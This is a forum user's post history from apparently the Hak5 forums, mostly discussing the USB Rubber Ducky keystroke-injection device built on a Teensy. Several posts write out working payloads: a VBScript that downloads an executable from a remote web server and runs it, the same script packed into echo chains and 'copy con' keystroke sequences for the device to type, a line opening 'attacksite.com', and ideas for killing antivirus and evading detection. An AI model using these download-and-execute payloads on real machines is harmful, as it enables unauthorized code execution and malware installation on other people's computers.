AndrewFaulds
-
Posts
22 -
Joined
-
Last visited
Posts posted by AndrewFaulds
-
-
well damn, im a noob. but can someone give me a design layout!
You need something like "Beginner's guide to embedded electronics"...
-
okay how would i get this on the teensy?
Well, you get a proto board, solder it in, attach wires, connect them to teensy and program it to use it.
-
I've been playing around with what could be done from the Windows Run window and have the following sample that you guys might be able to build more from.
1. Open Run window (window-R)
2. Create a script file (VBScript for this sample) and execute it with the following command:
cmd /c "echo wscript.echo "hello" > c:\temp\test.vbs && start wscript c:\temp\test.vbs"
A couple of notes about the command:
a. cmd /c is used so that the command window will close on completion
b. I'm using echo to build a text file in some directory (make sure it's a directory that exists and you have rw rights to!)
c. If you want to build a script with multiple lines, you can just use another echo statement, but be sure to use >> instead of > to append to the script file you're building
d. && is used to separate the commands
e. I'm calling the start command instead of wscript directly so that the cmd process doesn't have to wait for the VBScript file to complete before closing the command window
Not a perfect solution, and certainly not a sophisticated payload in this sample, but I'm sure you guys are more creative than me.
Sergio
TOPTIP:
Use copy con to build scripts instead of echo:
copy con script.vbsblah.blah
blah.blah.derp
blah[Ctrl+Z or F6]
-
That's a great idea. The Rockbox code base is incredibly clean and well organized making it very easy to hack. And you have the added bonus that an MP3 player looks completely innocuous when plugged into a computer. "Hey I need to charge my MP3 player, can I plug it in your USB port?"
And, disguised as a ducky, with a speaker soldered on, can play the rubber ducky song!
-
Correction: Nobody bothers to write viruses and by the nature of it being based off of UNIX, it has very few "hacks" because of things like stack protection that help to prevent buffer overflows, etc.
I know, I was joking.
The USB duck hack is very unreliable on the Mac due to the fact that very little in OS X is ever in exactly the same place computer to computer (Eg. dock at the bottom but can be resized and is centre aligned so things are never in the same place except on a clean install/user.) and that you can't exactly use the menu bar to open apps, you can use spotlight but that returns different items depending what the user uses regally.I'm going to do my best to get around these issues and make the best payloads I can but don't expect this to even work as well as it does on Windows.
Well, you can always use keyboard shortcuts. Although I doubt Mac OS X is very keyboard friendly.
-
I ordered 2 of Teensys too with a friend of mine, so could split the postage :)
That evil volcano ash seems to delay things though, dunno when it will arrive here...
Got few ideas ready, just need the hardware to test em out. Also trying to find a place where I can order PCB for that extremely small version I posted about. No luck yet, everyplace just seems to have minimum of 1000 to order :D
Those teensy tiny particles of silica from the volcano are stopping your Teensy.
-
i still like the VBS way of downloading more cos of the less time it shows something on the screen.
but if you want to do it that way,
i recommend just doing it in the run box.
like:
"c:\\Program Files\\Internet Explorer\\iexplore.exe" www.YOURSERVER/nox404/THEFILE.exe
that does the same, without showing the cmd at all ;)
Or, even better:
Open the run box, type iexplore http://attacksite.com
-
yes you can have multiple echo;s in one line.
it is separated by && and cmd recognises it as a new command.
i was thinking of this for at the run box.
cmd.exe /c <command> though the command was to long for the box.
when i order my duckey i will try both ways wich one is faster to execute
Still, copy con is more efficient.
-
It's quite a cheap endeavor, at least initially. It's when you're adding a bunch of sensors, memory card housings, TF cards, and rubber duckies that it starts to add on. And even then it's still a small price to pay for potential pwnage.
You also are forgetting the cost of Blue LEDs. They are essential.
-
Ah yes,
Thanks for bringing that up.
On that note do you know if that would effect the use of it as development?
And also would there be a way to change that?
(remove the Arduino from the board and load a library or something)
It makes it entirely useless.
That's how it "would effect the use of it as development".
As the serial converter chip, well, it appears as a serial COM port, and you need custom drivers for it.
If this was a MIDI Ducky, it'd be handy. But not for anything we want.
Perhaps the Arduino could do USB, with a custom USB port hooked up to the pins, but I somehow doubt if the Arduino's Serial IO mode is fast enough.
-
Removed, noob question already answered: http://www.hak5.org/forums/index.php?showtopic=16236
-
then what about this?
when a vbs script is activated the command promp is imidiatly back. it doesnt wait for it to finish so i think that the code from the fisrt post wont work propperly with bigger files.
so why not let the VBS execute the file. its only 3 lines.
Dim DataBin Dim HTTPGET Set HTTPGET = CreateObject("Microsoft.XMLHTTP") HTTPGET.Open "GET", "http://www.domain.com/file.exe", False HTTPGET.Send DataBin = HTTPGET.ResponseBody Const adTypeBinary=1 Const adSaveCreateOverWrite=2 Dim test1 Set test1 = CreateObject("ADODB.Stream") test1.Type = adTypeBinary test1.Open test1.Write DataBin test1.SaveToFile "file.exe", adSaveCreateOverWrite Set shell = CreateObject("WScript.Shell") shell.Run Chr(34) & "file.exe" & Chr(34), 1, false
and also you can put all the echo's in 1 string. so the waiting time is less then having to wait till the promt comes back up again.
it will look something like this:
echo Dim DataBin>dl.vbs && echo Dim HTTPGET>>dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>dl.vbs && echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs && echo HTTPGET.Send>>dl.vbs && echo DataBin = HTTPGET.ResponseBody>>dl.vbs && echo Const adTypeBinary=1 >>dl.vbs && echo Const adSaveCreateOverWrite=2 >>dl.vbs && echo Dim test1>>dl.vbs && echo Set test1 = CreateObject("ADODB.Stream")>>dl.vbs && echo test1.Type = adTypeBinary>>dl.vbs && echo test1.Open>>dl.vbs && echo test1.Write DataBin>>dl.vbs && echo test1.SaveToFile "file.exe", adSaveCreateOverWrite>>dl.vbs && echo Set shell = CreateObject("WScript.Shell")>>dl.vbs && echo shell.Run Chr(34) ^& "file.exe" ^& Chr(34), 1, false>>dl.vbs
and then all what is left is to run it and exit CMD:
promt> dl.vbs
promt> exit
i think this is the lowest time possible being at the command promt. or someone needs to find a way to srink the VB script even more! that would be awsome!
since i didnt got selected for a dev kit i am thinking of buying my own teensy. though a q? i read that darren is useing the original one. but i checked the site and all of their stuff uses mini usb. any good/simple way for a converter (buy a self making is oke)
cheers!
Uh....
You can't have multiple echo commands in a line.
And as I stated earlier, "echo something >dl.vbs" is less efficient than just copy con.
-
Something I'm hopefully going to test out is embedding the teensy inside an old white apple keyboard (Because it has huge amounts of space in the back for my crappy soldering.), taking out the USB controller board and running the buttons through the teensy for key logging or activating the payload when conditions are met.
So, Apple products don't get viruses?
It seems they get duckies.
-
Very nice work. Just tested it out by plugging in a random USB mouse. I did run into one small bug. When the program is running, plug in a new device, hit "ctrl+alt+del" then "esc" after the menu comes up. Then unplug the device. The letter "t" on the keyboard will no longer work. Tried it three times to make sure it wasn't me.
Other then that, great work. Will be running on my coloed server.
Oh those weird random-letter-no-longer-works bugs... I HATE THEM
-
4. Killing Anti-Virus by mouse click
This would be very simple after detecting antivirus in use. After the anti-virus is down, possibilities are endless.
It would be more efficient to do this using keyboard presses, as you can't guarantee window position.
Windows applications are HIGHLY keyboard accessible. Even the blind can brows animatedgifs.com!
-
Maybe something like this would work have the duck load up cmd and type in...
echo Dim DataBin >dl.vbs echo Dim HTTPGET >>dl.vbs echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>dl.vbs echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs echo HTTPGET.Send >>dl.vbs echo DataBin = HTTPGET.ResponseBody >>dl.vbs echo Const adTypeBinary=1 >>dl.vbs echo Const adSaveCreateOverWrite=2 >>dl.vbs echo Dim test1 >>dl.vbs echo Set test1 = CreateObject("ADODB.Stream") >>dl.vbs echo test1.Type = adTypeBinary >>dl.vbs echo test1.Open >>dl.vbs echo test1.Write DataBin >>dl.vbs echo test1.SaveToFile "file.exe", adSaveCreateOverWrite >>dl.vbs dl.vbs file.exe exit
this code will make a vb script that will execute and download a file from a web server. Then you run the file. There a few Anti Virus that detect this as bad but with some changes it will run good.
I Will be testing it here soon once my ducky gets here.
Tell me what you guys think?
Why the echo commands? copy con is more efficient ;)
Just do:
copy con dl.vbs[RETURN] Dim HTTPGET[RETURN] Set HTTPGET = CreateObject("Microsoft.XMLHTTP")[RETURN] HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False[RETURN] HTTPGET.Send[RETURN] DataBin = HTTPGET.ResponseBody[RETURN] Const adTypeBinary=1[RETURN] Const adSaveCreateOverWrite=2[RETURN] Dim test1[RETURN] Set test1 = CreateObject("ADODB.Stream")[RETURN] test1.Type = adTypeBinary[RETURN] test1.Open[RETURN] test1.Write DataBin[RETURN] test1.SaveToFile "file.exe", adSaveCreateOverWrite[CTRL+Z] file.exe[RETURN] exit[RETURN]
-
In regards of disconnecting the ducky, great idea, good that you thought of that!
I dont think copy con will work if the antivirus running (if not killed as discussed in another thread) has an instant scanning feature scanning contents of currently modified files..
Seb
Well, yes, but bear in mind most virus scanners won't know the exploit (assuming a new one), plus Ducky can create a different version every time with some crafty code.
-
USB hub with your ducky and a flashdrive maybe?
I'm looking for more 'creative' solutions, basically I'd like everything done as Keyboard input (if I have a choice :)
What I've just thought of would be using "copy con" to construct a script, e.g.
[WinKey+R] cmd [Enter] copy con quack.vbs[Enter] object = someobject[Enter] object.dosomething[Enter] end[CTRL+Z] quack.vbs[Enter]
Also one more idea: Make the ducky disconnect after delivering a payload, making it harder to detect.
-
In the USB Rubber Ducky Part 1 video, Darren says that you could potentially upload an executable payload from the HID.
How would you do this?
As even the smallest 10KB payload would take a long time to "type" into the PC, even automatically.
As mentioned elsewhere in this forum, with no delay, max speed would be around 500 chr/s. Now, uploading a binary via keystrokes would be slow, as binaries would have to be simulated as Alt+XXX key combinations to make it possible to enter the full range of 8-bit values. As a result, this 500 chr/s would become around 150 chr/s with no delay. At a rate of 150 bps, a 10KB (10240B) payload would take around 70 seconds to upload. That's way over a minute, and very inefficient.
Emulating a USB Flash Drive might work, but then the exploit could be blocked just as easily as the USB Switchblade.
Oh and Darren, if you're reading this: 1,1 is 1 pixel away from the very top-left corner of the screen. 0,0 would be correct.
-
Thanks!
So the Fonera+ IS in the Monkey Interceptor.
-
When will this happen?
I think the Fonera+ is much better than Fonera 2.0 for this, as it's far more portable.
Also, the la Fonera+ has 2 ethernet ports, which could be very useful...
Or is the la Fonera+ inside the yellow monkey thing?
As it has wifi and two ethernets...
hmm....
[Version 1] Uploading Executables?
in Classic USB Rubber Ducky
Posted
Then you're a script-kiddie and not a hacker?!